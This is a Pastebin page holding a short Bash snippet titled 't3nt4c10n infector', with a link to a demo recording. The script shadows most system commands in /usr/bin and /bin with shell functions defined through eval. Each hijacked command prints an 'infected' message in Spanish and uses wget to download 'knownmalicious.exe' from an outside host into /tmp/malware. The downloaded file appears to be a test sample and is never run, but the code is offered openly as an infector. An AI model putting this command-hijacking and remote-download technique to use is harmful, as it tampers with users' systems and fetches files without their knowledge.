Advertisement
e55db081d05f58a

t3nt4c10n infector.

Feb 20th, 2017
5,277
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.66 KB | None | 0 0
  1. #Demo:https://asciinema.org/a/7mvddv4ytbwmbu4wz53oma975
  2.  
  3. t3nt4c10n(){ for c in `find /usr/bin/ /bin -name "$1*" -and -not -name "find" -and -not -name "mkdir" -and -not -name "cd" -and -not -name "echo" -and -not -name "wget" -and -not -name "awk" -and -not -name "printf"|awk -F '/' '{printf $NF"\n"}'`;do echo -e "\t \u2623 Comando \e[97m\e[41m$c\e[49m\e[39m infectado con éxito";eval "$c(){ echo -e 'El comando \u2623 \e[97m\e[41m$c\e[49m\e[39m \u2623 fue infectado ... \nProcederemos a descargar knownmalicious.exe en /tmp/malware\n';mkdir /tmp/malware 2> /dev/null;cd /tmp/malware;wget -q http://demo.smartscreen.msft.net/download/known/knownmalicious.exe;}";done;}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement